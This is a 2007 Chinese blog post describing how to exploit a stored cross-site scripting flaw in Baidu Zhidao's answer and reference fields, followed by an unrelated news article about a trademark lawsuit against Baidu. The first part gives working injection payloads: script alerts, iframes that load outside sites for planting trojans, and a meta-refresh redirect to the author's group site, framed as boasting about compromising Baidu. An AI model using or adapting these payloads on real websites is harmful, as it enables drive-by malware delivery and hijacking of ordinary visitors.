<<  看看哪款ADSL虚拟拨号软件适合你? | 首 页 | 全面详尽剖析一句话asp木马  >>

  • 2007年05月12日

    百度再现XSS高危漏洞--XSS百度永远抹不掉的伤痕 - [安全资讯]

    百度再现XSS高危漏洞--XSS百度永远抹不掉的伤痕

    文章作者:lszm

    技术团队:鬼混客信息安全小组(www.ghkcn.cn)   & 西盟网安小组(http://bbs.zmke.com)

    以前写过二三次关于百度XSS的文章,特别上次的baidu知道title标签的跨站,好似引起了好些人的关注,那篇文章我写得比较详细,对百度的各个脚落做了检测,本以为这些就完了,今天再去百度,竟在百度知道里再次发现XSS,而这个XSS竟似乎利用价值远远高过前几次发现的..

    为什么说这次的利用价值高呢?就一点:这次的XSS不用构造任何URL..

    具体这个漏洞是如何造成的呢,且看下文,听我详谈!

    进入百度知道,这次我们回答问题!随便找一个问题吧,回答,当然你要先注册一个用户,直接在回答问题框输入我们的跨站检测代码""当然最好再给前面也打几个意思意思的字,要不就会被百度当成AD直接T掉了,下面还有个网址引用的地方,直接也加上我们的测试代码吧!如图:



    提交后,查看我们回答的问题,再查看源文件,发现如下:

    Copy code

    ><font color=#777777>关闭</font></a></td></tr></table>

    <textarea name="co" cols="60" rows="10" style="margin-top:10px;">到处加群,加上N个,然后在群里面发广告,嘿,不过估计发不了几个就被T了!

    <></textarea>

    <br>回答字数10000字以内<br><br></td>

    </tr>

    <tr valign="top">

    <td nowrap class="f14">参考资料:</td>

    <td><input name="sn" type="text" size="50" value="http://www.zmke.com<>">

    我们输入的二处<>未做任何过滤及转换,仅仅是做了些简单的屏蔽,这很好突破!

    再次回到我们回答问题的框框,当然你也可以修改刚才回答的问题,测试代码我们做出这样的处理:

    </textarea><script>alert(/lszm   QQ:9155658/)</script><textarea>这是内容那的代码,引用网址那我们做出如下构造: "><script>alert(/lszm QQ:9155658/)</script><"   原理还是让标签提前开始与提前结束的原理!

    再次提交!

    查看我们回答问题的贴子,出现如图所示:



    测试一下,跨了二次,二次均完全突破限制!

    试过了这个,我们试个挂马代码试试,同样的突破限制的方法,分别如此构造

    </textarea><iframe src=http://zmke.com width=555 height=120></iframe><textarea">

    "><iframe src=http://bbs.ghkcn.cn width=555 height=120></iframe><"

    而后提交!

    结果没见到任何效果,再点修改回答,出现如图:



    挂马效果是出现了,但能修改这个回答的人只有你一个,似乎利用价值不大,而后我对源码做了好几次改进,结果均突破失败,似乎没办法了。哪位高手如果能够突破这层请回个贴子告诉我哦,嘿!

    转换思路再次突破!

    难道真的就没有办法了吗?答案是:NO,

    这时我想到的转向代码!如果我们将转向后的页面设成我们的挂马网马的页面,同样可以达到相同的效果,于是我做了测试!

    输入如下代码:

    </textarea><Meta http-equiv="refresh" content="3;url='http://bbs.ghkcn.cn' "><textarea>

    提交

    再次查看我们的回答,三秒钟后,如图:



    瞧开始转向了,马上,百度的页向转向了鬼混客,于是百度被我们成功的XX了!

    大众搬场状告百度侵犯商标权

    作者:陈姗姗 | 出处:第一财经日报 |

     

      百度网站首次因为侵犯商标权被告上法庭。

      昨天,《第一财经日报》获悉,上海大众交通(集团)股份有限公司旗下的上海大众搬场物流有限公司(下称“大众搬场”)5月9日向上海市第二中级人民法院提起诉讼,状告百度网站侵犯商标权。

      据记者了解,百度网站被告侵犯商标权,缘于其“竞价排名”和“火爆地带”栏目网页中出现的大量假冒大众搬场名称甚至商标的链接网站。这些链接网站的网页均以与大众搬场相同或近似的法人名称招揽、经营搬场物流业务,并擅自使用大众搬场拥有排他许可使用权的“大众”注册商标。

      而实际上,这些假冒大众搬场的经营者均未经上海市工商行政管理部门批准登记,完全不具有经营相关业务和进行广告宣传的主体资格。大众搬场认为百度网站上的上述内容给其正常经营活动造成了极其不利的影响,根据从百度网站上查询的关于“竞价排名”和“火爆地带”的业务介绍,认为该两个栏目属于网络推广的广告方式,百度应属广告发布者。

      大众搬场方面认为,注册商标排他许可使用权和法人名称权合法有效,应受法律保护。在百度网站“竞价排名”和“火爆地带”网页中所列的假冒原告的经营者,己明显侵犯原告的民事权利。同时,根据《广告法》第二条和第二十七规定,百度对于所发布的广告负有查验有关证明文件、核实广告内容、不得发布内容不实或者证明文件不全的广告的义务。由于百度显然没有依法履行广告发布者的上述义务,因此其发布侵权广告的行为也对大众搬场构成侵权。

      在百度上搜索“大众搬场”,可以搜索到10万余篇相关链接,但大众交通(集团)股份有限公司的律师主任赵思渊告诉记者,以前大众搬场并没有单独的网站,而是链接在大众交通网站之下,因此这些搜索到的链接,都不是真正的“大众搬场”。“百度方面明显没有对相关企业的真实资质做好审核。”

      而对于对相关企业的真实资质做审核问题,百度方面昨天没有给出正面回答,只是表示百度一贯高度重视知识产权保护并遵守我国各项知识产权法律法规,并制定了旨在保护知识产权权利人合法权益的措施和步骤。“针对此类事件,任何个人或单位都可以书面方式向百度提交权利通知,百度将根据我国法律法规和政府规范性文件采取措施。针对形式多样的可能威胁企业知识产权的行为,百度公司特设有专门的人员予以接待质疑和查询,并已经与许多信息提供方一道共同处理了多起类似事件。”

      据记者了解,上海市第二中级人民法院已立案受理,本案进入法律程序。

    随机文章:


    收藏到:Del.icio.us





    Tag:百度 XSS 漏洞 侵权
    引用地址:
    查皮 发表于12时24分19秒 | 编辑 | 继续话题 | 转发 | 推荐

发表评论

您将收到博主的回复邮件
记住我